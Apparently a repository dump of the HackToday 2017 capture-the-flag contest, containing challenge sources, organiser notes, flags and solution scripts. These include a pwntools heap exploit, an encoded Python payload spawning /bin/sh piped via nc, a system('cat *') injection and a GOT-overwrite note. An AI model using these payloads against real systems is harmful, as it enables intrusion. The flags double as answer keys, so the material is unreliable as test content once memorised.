├── 2017-quals ├── cryptography │ ├── init │ ├── cbc │ │ ├── rahasia.py │ │ ├── run.sh │ │ ├── Dockerfile │ │ └── notes.txt │ ├── WutDiHell │ │ ├── SecureChat │ │ │ ├── build_tasks │ │ │ │ ├── api_tasks.js │ │ │ │ ├── app_tasks.js │ │ │ │ └── automation_tasks.js │ │ │ ├── .gitignore │ │ │ ├── bower.json │ │ │ ├── package.json │ │ │ ├── app │ │ │ │ ├── index.html │ │ │ │ ├── scripts │ │ │ │ │ └── format-hex.js │ │ │ │ └── css │ │ │ │ │ └── site.css │ │ │ ├── gulpfile.js │ │ │ └── app.js │ │ ├── flag.enc │ │ ├── README.md │ │ ├── ETA TERANGKANLAH │ │ ├── public │ │ └── generated │ └── circle │ │ ├── README.md │ │ ├── solution.py │ │ └── circle.py ├── exploitation │ ├── init │ ├── mrx │ │ ├── flag │ │ ├── .gdb_history │ │ ├── mrx │ │ ├── README.md │ │ └── mrx.c │ ├── chatbot │ │ ├── flag │ │ ├── chatbot │ │ ├── docker-compose.yml │ │ ├── Dockerfile │ │ └── src │ │ │ └── chatbot.c │ ├── epoch-service │ │ ├── flag │ │ ├── epoch │ │ ├── docker-compose.yml │ │ ├── src │ │ │ ├── epoch.c │ │ │ └── poc.py │ │ └── Dockerfile │ └── turuturu │ │ ├── flag │ │ ├── turuturu │ │ ├── turuturu.gz │ │ ├── docker-compose.yml │ │ ├── Dockerfile │ │ └── src │ │ └── turuturu.c ├── forensics │ ├── init │ ├── dump-incident │ │ ├── flag │ │ ├── README.md │ │ └── access.log.gz │ └── wirelessmouse │ │ ├── flag │ │ ├── remotemouse.pcapng │ │ ├── notes.txt │ │ └── key.txt ├── web-hacking │ ├── init │ ├── comot │ │ ├── src │ │ │ ├── websrc │ │ │ │ ├── report │ │ │ │ │ ├── visit_list │ │ │ │ │ └── rotate.php │ │ │ │ ├── admin │ │ │ │ │ ├── flag │ │ │ │ │ ├── index.php │ │ │ │ │ └── date.php │ │ │ │ └── notes.txt │ │ │ └── botsrc │ │ │ │ ├── comot.sh │ │ │ │ └── comot.py │ │ ├── flag │ │ └── README.md │ ├── where_it_is │ │ ├── flag │ │ ├── requirements.txt │ │ ├── src │ │ │ ├── static │ │ │ │ ├── css │ │ │ │ │ └── flag │ │ │ │ ├── closer.html │ │ │ │ ├── index.html │ │ │ │ └── portal.html │ │ │ ├── templates │ │ │ │ └── 404.html │ │ │ └── main.py │ │ ├── Note │ │ ├── Dockerfile │ │ ├── here │ │ │ └── main.py │ │ └── Dockerfile.old │ ├── time_is_money │ │ └── index.php │ └── privilege_escalation │ │ ├── login.php │ │ └── register.php ├── reverse-engineering │ ├── init │ ├── balikin │ │ ├── flag │ │ ├── hasil │ │ ├── balikin.zip │ │ └── main.py │ ├── rennai │ │ ├── flag │ │ ├── rennai │ │ └── rennai.gz │ ├── resqua │ │ ├── resqua │ │ ├── notes.txt │ │ └── resqua.php │ └── webasm │ │ ├── release │ │ └── webasm.wasm │ │ ├── notes.txt │ │ └── src │ │ └── webasm.c ├── easy │ └── index.php └── README.md ├── 2017-finals ├── soal │ ├── cacah_jiwa │ │ ├── README │ │ ├── cacah │ │ ├── cacah.py │ │ ├── cacah.c │ │ ├── Dockerfile │ │ └── docker_build.sh │ ├── math_service │ │ ├── .gdb_history │ │ ├── solusi │ │ ├── description │ │ ├── alfamidi_jackpot │ │ ├── docker_build.sh │ │ ├── Dockerfile │ │ └── math │ ├── howto_blog │ │ ├── challs │ │ │ ├── tests │ │ │ │ ├── _data │ │ │ │ │ └── .gitkeep │ │ │ │ ├── _output │ │ │ │ │ └── .gitignore │ │ │ │ ├── acceptance │ │ │ │ │ ├── _bootstrap.php │ │ │ │ │ ├── AboutCest.php │ │ │ │ │ ├── HomeCest.php │ │ │ │ │ ├── LoginCest.php │ │ │ │ │ └── ContactCest.php │ │ │ │ ├── functional │ │ │ │ │ ├── _bootstrap.php │ │ │ │ │ ├── LoginFormCest.php │ │ │ │ │ └── ContactFormCest.php │ │ │ │ ├── unit │ │ │ │ │ ├── _bootstrap.php │ │ │ │ │ └── models │ │ │ │ │ │ ├── UserTest.php │ │ │ │ │ │ ├── LoginFormTest.php │ │ │ │ │ │ └── ContactFormTest.php │ │ │ │ ├── _bootstrap.php │ │ │ │ ├── unit.suite.yml │ │ │ │ ├── acceptance.suite.yml.example │ │ │ │ ├── functional.suite.yml │ │ │ │ ├── bin │ │ │ │ │ ├── yii.bat │ │ │ │ │ └── yii │ │ │ │ └── _support │ │ │ │ │ ├── FunctionalTester.php │ │ │ │ │ ├── UnitTester.php │ │ │ │ │ └── AcceptanceTester.php │ │ │ ├── robots.txt │ │ │ ├── runtime │ │ │ │ └── .gitignore │ │ │ ├── flag │ │ │ │ └── flag.txt │ │ │ ├── .bowerrc │ │ │ ├── config │ │ │ │ ├── params.php │ │ │ │ ├── test_db.php │ │ │ │ ├── db.php │ │ │ │ ├── console.php │ │ │ │ ├── test.php │ │ │ │ └── web.php │ │ │ ├── favicon.ico │ │ │ ├── sqlite │ │ │ │ └── mass.db │ │ │ ├── .htaccess │ │ │ ├── index.php │ │ │ ├── views │ │ │ │ └── site │ │ │ │ │ ├── about.php │ │ │ │ │ ├── error.php │ │ │ │ │ ├── register.php │ │ │ │ │ └── login.php │ │ │ ├── README.md │ │ │ ├── yii.bat │ │ │ ├── yii │ │ │ ├── assets │ │ │ │ └── AppAsset.php │ │ │ ├── .travis.yml │ │ │ ├── mail │ │ │ │ └── layouts │ │ │ │ │ └── html.php │ │ │ ├── commands │ │ │ │ └── HelloController.php │ │ │ ├── codeception.yml │ │ │ ├── models │ │ │ │ ├── UsersDB.php │ │ │ │ ├── LoginForm.php │ │ │ │ └── User.php │ │ │ ├── css │ │ │ │ └── site.css │ │ │ ├── composer.json │ │ │ └── widgets │ │ │ │ └── Alert.php │ │ ├── .bowerrc │ │ ├── challs_description │ │ ├── .htaccess │ │ ├── .travis.yml │ │ └── docker_build.sh │ ├── birthday_card │ │ ├── challs │ │ │ ├── requirements.txt │ │ │ ├── wsgi.py │ │ │ ├── description │ │ │ └── templates │ │ │ │ └── home.html │ │ ├── docker_build.sh │ │ └── Dockerfile │ ├── buaya_lsi │ │ ├── buaya │ │ ├── README │ │ ├── buaya.gambar │ │ ├── docker_build.sh │ │ └── Dockerfile │ ├── musicality_icon │ │ ├── challs │ │ │ ├── config │ │ │ │ └── dbconnection.php │ │ │ ├── sqlite │ │ │ │ └── data.db │ │ │ ├── static │ │ │ │ ├── img │ │ │ │ │ └── default_avatar.png │ │ │ │ ├── vendor │ │ │ │ │ └── inputmask │ │ │ │ │ │ ├── global │ │ │ │ │ │ ├── window.min.js │ │ │ │ │ │ └── document.min.js │ │ │ │ │ │ ├── dependencyLibs │ │ │ │ │ │ ├── inputmask.dependencyLib.jquery.min.js │ │ │ │ │ │ └── inputmask.dependencyLib.jqlite.min.js │ │ │ │ │ │ ├── bindings │ │ │ │ │ │ └── inputmask.binding.min.js │ │ │ │ │ │ ├── jquery.inputmask.min.js │ │ │ │ │ │ ├── inputmask.extensions.min.js │ │ │ │ │ │ └── inputmask.phone.extensions.min.js │ │ │ │ └── css │ │ │ │ │ └── one-page-wonder.css │ │ │ ├── page │ │ │ │ ├── logout.php │ │ │ │ ├── 404.php │ │ │ │ ├── register.php │ │ │ │ ├── login.php │ │ │ │ └── home.php │ │ │ ├── .htaccess │ │ │ ├── README.md │ │ │ ├── index.php │ │ │ └── content │ │ │ │ ├── footer.php │ │ │ │ ├── head.php │ │ │ │ └── header.php │ │ ├── challs_description │ │ └── docker_build.sh │ ├── kudanil_lsi │ │ ├── kudanil_lsi │ │ ├── map.solution │ │ ├── map │ │ ├── solution.py │ │ ├── Dockerfile │ │ └── docker_build.sh │ ├── token.list │ ├── name.list │ ├── username.list │ ├── password.list │ ├── sanca │ │ ├── solve.py │ │ ├── sanca │ │ ├── Dockerfile │ │ └── docker_build.sh │ ├── README.md │ ├── gen_creds.sh │ ├── entry_username_password.py │ ├── flag_submit.py │ └── autodeploy.sh ├── bot │ ├── README.md │ ├── run_bot.sh │ ├── bot6.py │ ├── bot3.py │ ├── bot8.py │ ├── bot5.py │ ├── bot2.py │ ├── bot1.py │ ├── bot4.py │ └── bot7.py ├── soal-backup │ ├── permute │ │ ├── Makefile │ │ ├── theflag │ │ ├── permute.h │ │ ├── README │ │ ├── gen.py │ │ └── theflag.c │ └── troll │ │ ├── README.txt │ │ ├── genflag.py │ │ ├── tf.txt │ │ └── troll.txt ├── flag_tester │ ├── start_tpl.sh │ ├── README.md │ ├── test_service_6.py │ ├── test_service_3.py │ ├── test_service_1.py │ ├── test_service_4.py │ ├── test_service_7.py │ └── test_service_8.py └── README.md ├── .gitignore ├── platform-attack-defense ├── bot │ └── README.md ├── deploy-scripts │ └── README.md └── web-platform │ ├── landing.php │ ├── index.php │ ├── README.md │ └── admin.php └── README.md /2017-quals/cryptography/init: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-quals/exploitation/init: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-quals/forensics/init: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/init: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/init: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-finals/soal/cacah_jiwa/README: -------------------------------------------------------------------------------- 1 | Heap 2 | -------------------------------------------------------------------------------- /2017-finals/soal/math_service/.gdb_history: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.csv 2 | *.log 3 | *.list 4 | *.gz 5 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/comot/src/websrc/report/visit_list: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_data/.gitkeep: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /2017-finals/soal/math_service/solusi: -------------------------------------------------------------------------------- 1 | 5+5 2 | system('cat *')= 3 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/runtime/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_output/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance/_bootstrap.php: -------------------------------------------------------------------------------- 1 | 'admin@example.com', 5 | ]; 6 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/build_tasks/api_tasks.js: -------------------------------------------------------------------------------- 1 | module.exports = function(gulp, plugins, params) { 2 | 3 | } -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/build_tasks/app_tasks.js: -------------------------------------------------------------------------------- 1 | module.exports = function(gulp, plugins, params) { 2 | 3 | } -------------------------------------------------------------------------------- /2017-finals/soal-backup/permute/theflag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal-backup/permute/theflag -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/kudanil_lsi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/kudanil_lsi/kudanil_lsi -------------------------------------------------------------------------------- /2017-finals/soal/token.list: -------------------------------------------------------------------------------- 1 | djkrw 2 | bbzne 3 | cugtg 4 | rvegp 5 | vdwpc 6 | meswf 7 | xqgdr 8 | mdvwb 9 | ncvoj 10 | tpjtw 11 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/build_tasks/automation_tasks.js: -------------------------------------------------------------------------------- 1 | module.exports = function(gulp, plugins, params) { 2 | 3 | } -------------------------------------------------------------------------------- /2017-quals/exploitation/chatbot/chatbot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/exploitation/chatbot/chatbot -------------------------------------------------------------------------------- /platform-attack-defense/web-platform/landing.php: -------------------------------------------------------------------------------- 1 | 5 | 6 |

scoreboard & flag submit form

7 |

8 | -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/map.solution: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/kudanil_lsi/map.solution -------------------------------------------------------------------------------- /2017-quals/exploitation/epoch-service/epoch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/exploitation/epoch-service/epoch -------------------------------------------------------------------------------- /2017-quals/exploitation/turuturu/turuturu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/exploitation/turuturu/turuturu -------------------------------------------------------------------------------- /2017-finals/soal/birthday_card/challs/wsgi.py: -------------------------------------------------------------------------------- 1 | from main import application 2 | 3 | if __name__ =="__main__": 4 | application.run() 5 | 6 | -------------------------------------------------------------------------------- /2017-quals/exploitation/turuturu/turuturu.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/exploitation/turuturu/turuturu.gz -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/rennai/rennai: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/reverse-engineering/rennai/rennai -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/resqua/resqua: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/reverse-engineering/resqua/resqua -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/howto_blog/challs/favicon.ico -------------------------------------------------------------------------------- /2017-finals/soal/math_service/alfamidi_jackpot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/math_service/alfamidi_jackpot -------------------------------------------------------------------------------- /2017-quals/forensics/dump-incident/access.log.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/forensics/dump-incident/access.log.gz -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/rennai/rennai.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/reverse-engineering/rennai/rennai.gz -------------------------------------------------------------------------------- /2017-quals/web-hacking/comot/src/websrc/admin/index.php: -------------------------------------------------------------------------------- 1 |

2 | check server day (admin only): date 3 |

4 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/sqlite/mass.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/howto_blog/challs/sqlite/mass.db -------------------------------------------------------------------------------- /2017-quals/exploitation/mrx/README.md: -------------------------------------------------------------------------------- 1 | - Kesalahan implementasi pada scanf. 2 | - Akibatnya, bisa menimpa apa pun dan mengarahkan GOT ke system('/bin/sh'). 3 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/balikin/balikin.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/reverse-engineering/balikin/balikin.zip -------------------------------------------------------------------------------- /2017-quals/forensics/wirelessmouse/remotemouse.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/forensics/wirelessmouse/remotemouse.pcapng -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/sqlite/data.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/musicality_icon/challs/sqlite/data.db -------------------------------------------------------------------------------- /2017-finals/soal/name.list: -------------------------------------------------------------------------------- 1 | Airavata 2 | Petir0x02 3 | OwaOwa 4 | PolyEtherKetone 5 | Tenesys 6 | TydacBerfaedah 7 | JAV 8 | deadf00d 9 | PoKariSup 10 | retasan 11 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/webasm/release/webasm.wasm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-quals/reverse-engineering/webasm/release/webasm.wasm -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/src/static/css/flag: -------------------------------------------------------------------------------- 1 | saya memberi sebuah portal, dengan nama portal, cobalah kunjungi 2 | 3 | ln -s / portal 4 | 5 | /here/main.py 6 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/troll/README.txt: -------------------------------------------------------------------------------- 1 | untuk generate flag baru: 2 | - edit genflag.py, masukin flag baru 3 | - python genflag.py 4 | - ganti isi index.html dengan tf.txt 5 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/webasm/notes.txt: -------------------------------------------------------------------------------- 1 | Host file di dalem folder `release` ke webserver. 2 | Kasih alamatnya di soal. 3 | 4 | Flag: HackToday{k0pi_nikmat_gak_bikin_kembung} 5 | -------------------------------------------------------------------------------- /2017-finals/soal/username.list: -------------------------------------------------------------------------------- 1 | ddicscovkp 2 | kcpinszofy 3 | wjqmblkshv 4 | zcmwsyerls 5 | eskedtudhe 6 | pchwbcsoir 7 | axtraakhyc 8 | rfqyairhsv 9 | abqveeqxvh 10 | onloabvumk 11 | -------------------------------------------------------------------------------- /2017-quals/cryptography/circle/README.md: -------------------------------------------------------------------------------- 1 | Yang diberikan ke peserta : Hy80o81d9}95{8047Ta887k43c2a dan source codenya. 2 | 3 |

#flag : HackToday{09348789288851074}

4 |

#n = 8

5 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/img/default_avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/grittyninja/HackToday/HEAD/2017-finals/soal/musicality_icon/challs/static/img/default_avatar.png -------------------------------------------------------------------------------- /2017-finals/soal/buaya_lsi/README: -------------------------------------------------------------------------------- 1 | ROP (setresuid bocor) + n_queen 2 | Letakkan binary buaya di server dengan chown user lain (misal user X) 3 | Permission buaya 4755 4 | Permission flag 600 milik user X 5 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/resqua/notes.txt: -------------------------------------------------------------------------------- 1 | Host `resqua.php` di sembarang web server, kasih alamatnya di soal. 2 | Kasih binary `resqua` di soal. 3 | 4 | Flag: HackToday{perfect_square_is_perfect} 5 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/flag.enc: -------------------------------------------------------------------------------- 1 | U2FsdGVkX19518OQYHlUgTYuUnOuxXe6x98R2vjoQ7nZ6gE14/I2if3cyamNwZex 2 | Txf1a1989aEHYkyL0Ezj0dgJxZDYPSIpsf9PJXqV7IGsOFC+zJTGdfdDhk7W3oJC 3 | s5WLLjw9JnAt2xfriuD4jw== 4 | -------------------------------------------------------------------------------- /2017-quals/forensics/wirelessmouse/notes.txt: -------------------------------------------------------------------------------- 1 | Kami telah mengintercept koneksi salah satu user http://www.remotemouse.net/. User tersebut menggunakan gadget android untuk mengontrol laptop Windows miliknya. 2 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/page/logout.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | flagnya di /flag 4 | 5 | 6 |

7 | One step closer 8 |

9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /2017-quals/cryptography/cbc/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:2 2 | 3 | WORKDIR /usr/src/app 4 | 5 | RUN pip install pycrypto 6 | 7 | COPY cbc_server.py . 8 | COPY rahasia.py . 9 | 10 | CMD [ "python", "./cbc_server.py" ] 11 | 12 | -------------------------------------------------------------------------------- /2017-finals/soal/password.list: -------------------------------------------------------------------------------- 1 | lyuvwlxcxdobepp 2 | wimxkbbcumqcsld 3 | czvqiqqhplgampq 4 | qmpxkumvcxjljws 5 | zczotdmaxzsdykt 6 | qzeztkxbgzigskx 7 | hzjjmjwjwjdhxfs 8 | iujdieqauwfhgpn 9 | zhblwomfuxfeddv 10 | pybcrwhrqkwzbqm 11 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/permute/permute.h: -------------------------------------------------------------------------------- 1 | const char *trick_str = "HackToday{xxtHi$_1s_N0t_The_real_Flagxx}"; 2 | int permute[] = {13, 1, 2, 3, 24, 5, 6, 1, 8, 9, 18, 22, 28, 17, 20, 36, 15, 23, 22, 28, 17, 2, 3, 18, 32, 0, 1, 2, 3, 39, -1}; 3 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/.gitignore: -------------------------------------------------------------------------------- 1 | # Npm 2 | node_modules/ 3 | 4 | # Bower 5 | bower_components/ 6 | 7 | # Istanbul 8 | coverage/ 9 | 10 | # Mocha 11 | test_reports/ 12 | 13 | # Build output files 14 | artifacts/ -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs_description: -------------------------------------------------------------------------------- 1 | Pak Agri sedang mengembangkan situs untuk saling berbagi artikel. Untuk saat ini situs tersebut hanya baru memiliki fitur login dan registrasi. Daftar di situs tersebut sebagai admin dan dapatkan flag-nya. -------------------------------------------------------------------------------- /2017-finals/soal/birthday_card/challs/description: -------------------------------------------------------------------------------- 1 | # BirthDay Card 2 | 3 | ## Type: Template Injection 4 | 5 | ### Input is evil 6 | 7 | 8 | hint: template / flask 9 | 10 | Source mungkin tidak perlu diberi ke peserta karena straightforward 11 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_bootstrap.php: -------------------------------------------------------------------------------- 1 | 9 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/src/static/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | flagnya di /flag 4 | 5 | 6 |

7 | "Not Found" itu baik 8 |

9 |

10 | tidak perlu tools 11 |

12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/src/static/portal.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | flagnya di /flag 4 | 5 | 6 |

7 | Now you in portal, use it 8 |

9 |

10 | /here/main.py 11 |

12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/Note: -------------------------------------------------------------------------------- 1 | directory traversal 2 | 3 | di test di : 4 | flask 0.12.2 5 | python 3.5 6 | 7 | setup: 8 | masukin environment variable dari FLAG 9 | di folder src/static/css buat link ke / 10 | ln -s / portal 11 | 12 | Need to do: test & hardening 13 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/comot/README.md: -------------------------------------------------------------------------------- 1 | Bot Dependencies: 2 | - phantomjs 3 | - selenium python packages 4 | 5 | Solution: 6 | `` 7 | -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/map: -------------------------------------------------------------------------------- 1 | h*~*****~**~~~~~~~~ 2 | ~~~~~*~~*~~~~~*~~~~ 3 | *~*~*~~~~***~~*~~*~ 4 | ~~~~~*****~*~~~~~~~ 5 | ~*~~~~~~~***~~*~~** 6 | ~~~*~*~~***~~~~~*~* 7 | ~~~*~**~~~~~~*~~~~~ 8 | ~~~~~*~~~~~~*~~~~~~ 9 | ~~~~~*~*~*~~~~~**~~ 10 | ~*~~*~~~***~~**~*~~ 11 | ~~~*~~~~~*~~/bin/su -------------------------------------------------------------------------------- /2017-quals/easy/index.php: -------------------------------------------------------------------------------- 1 | 11 | -------------------------------------------------------------------------------- /2017-finals/bot/run_bot.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | nohup python bot1.py & 4 | # nohup python bot2.py & 5 | # nohup python bot3.py & 6 | # nohup python bot4.py & 7 | nohup python bot5.py & 8 | # nohup python bot6.py & 9 | # nohup python bot7.py & 10 | # nohup python bot8.py & 11 | 12 | sleep 99999999999999 -------------------------------------------------------------------------------- /2017-quals/cryptography/cbc/notes.txt: -------------------------------------------------------------------------------- 1 | Jalankan `cbc_server.py` (listening di port 9876), bisa diganti portnya di kodingan. 2 | File `rahasia.py` taroh sefolder sama `cbc_server.py`. 3 | 4 | Kasih ke peserta `cbc_server.py` aja, jangan rahasianya. 5 | 6 | Flag: HackToday{flipping_tables_is_better_than_flipping_bits} 7 | 8 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance/AboutCest.php: -------------------------------------------------------------------------------- 1 | amOnPage(Url::toRoute('/site/about')); 9 | $I->see('About', 'h1'); 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/.htaccess: -------------------------------------------------------------------------------- 1 | Options +FollowSymLinks 2 | IndexIgnore */* 3 | 4 | RewriteEngine on 5 | 6 | # if a directory or a file exists, use it directly 7 | RewriteCond %{REQUEST_FILENAME} !-f 8 | RewriteCond %{REQUEST_FILENAME} !-d 9 | 10 | # otherwise forward it to index.php 11 | RewriteRule . index.php -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/.htaccess: -------------------------------------------------------------------------------- 1 | Options +FollowSymLinks 2 | IndexIgnore */* 3 | 4 | RewriteEngine on 5 | 6 | # if a directory or a file exists, use it directly 7 | RewriteCond %{REQUEST_FILENAME} !-f 8 | RewriteCond %{REQUEST_FILENAME} !-d 9 | 10 | # otherwise forward it to index.php 11 | RewriteRule . index.php -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/unit.suite.yml: -------------------------------------------------------------------------------- 1 | # Codeception Test Suite Configuration 2 | 3 | # suite for unit (internal) tests. 4 | # RUN `build` COMMAND AFTER ADDING/REMOVING MODULES. 5 | 6 | class_name: UnitTester 7 | modules: 8 | enabled: 9 | - Asserts 10 | - Yii2: 11 | part: [orm, email] -------------------------------------------------------------------------------- /platform-attack-defense/web-platform/index.php: -------------------------------------------------------------------------------- 1 | 4 |

halaman login semua

5 | 6 |
7 | 8 |
9 | 10 |
11 | 12 | 13 |
14 | 15 | 16 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/permute/README: -------------------------------------------------------------------------------- 1 | Ini soalnya cuma file: theflag (cuma ini yg diberikan ke peserta) 2 | 3 | sisanya source code, siapa tau mau dicompile buat platform lain atau mau diganti flagnya 4 | 5 | untuk ganti flag: 6 | - edit file gen.py ganti flag tipuan dan flag benerannya 7 | - python gen.py > permute.h 8 | - make 9 | 10 | 11 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Options +FollowSymLinks 3 | Options -Indexes 4 | 5 | RewriteEngine On 6 | 7 | RewriteCond %{REQUEST_FILENAME} !-f 8 | RewriteCond %{REQUEST_FILENAME} !-d 9 | RewriteRule ^([0-9a-zA-Z\-]*)$ index.php?p=$1 [QSA,L] 10 | 11 | ErrorDocument 404 /404 12 | -------------------------------------------------------------------------------- /2017-finals/soal/cacah_jiwa/cacah.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from pwn import * 4 | 5 | context(arch='i386', bits=32, os='linux') 6 | a = process('./cacah') 7 | 8 | print a.recvuntil('Nama suami : ') 9 | a.sendline('a'*16 + p32(0x0804a010)) 10 | 11 | print a.recvuntil('Nama istri : ') 12 | a.sendline(p32(0x08048598)) 13 | 14 | a.interactive() 15 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance.suite.yml.example: -------------------------------------------------------------------------------- 1 | class_name: AcceptanceTester 2 | modules: 3 | enabled: 4 | - WebDriver: 5 | url: http://127.0.0.1:8080/ 6 | browser: firefox 7 | - Yii2: 8 | part: orm 9 | entryScript: index-test.php 10 | cleanup: false 11 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs_description: -------------------------------------------------------------------------------- 1 | Mz Djent adalah seorang pemusik dan programmer. Ia kini sedang mengembangkan situs untuk saling berbagi karya musik. Saat ini situs tersebut sudah dapat melakukan login dan registrasi. Ia mengimplementasikan fitur untuk mengunggah avatar/gambar profil melalui URL. Daftar di situs tersebut dan cari cara untuk mendapatkan flag-nya. -------------------------------------------------------------------------------- /2017-finals/soal/sanca/solve.py: -------------------------------------------------------------------------------- 1 | def unicode_escape(s): 2 | res = '' 3 | for c in s: 4 | res += '\\'+oct(ord(c)).lstrip("0").zfill(3) 5 | return res 6 | 7 | payload = '__import__("os").system("/bin/sh")' 8 | payload = unicode_escape(payload) 9 | print "# Encoding: Unicode_Escape \r" + payload 10 | 11 | #howtouse: (python solve.py;cat -) | nc ip port -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/ETA TERANGKANLAH: -------------------------------------------------------------------------------- 1 | USE SECRET TO DECRYPT THE FILE 2 | ============================================================== 3 | Encrypt 4 | openssl aes-256-cbc -a -in flag -out flag.enc 5 | ============================================================== 6 | Decrypt 7 | openssl aes-256-cbc -a -d -in flag.enc -out flag 8 | ============================================================== -------------------------------------------------------------------------------- /2017-finals/soal/README.md: -------------------------------------------------------------------------------- 1 | ## TESTING JOURNEY 2 | 3 | | NAMA SOAL | STATUS | 4 | |--- |--- | 5 | | birthday_card | TESTED | 6 | | buaya_lsi | TESTED | 7 | | cacah_jiwa | X | 8 | | howto_blog | TESTED | 9 | | kudanil_lsi | X | 10 | | math_service | TESTED | 11 | | musicality_icon | TESTED | 12 | | sanca | TESTED | 13 | -------------------------------------------------------------------------------- /2017-quals/cryptography/circle/solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import circle 4 | import sys 5 | 6 | for j in range(1, 100): 7 | 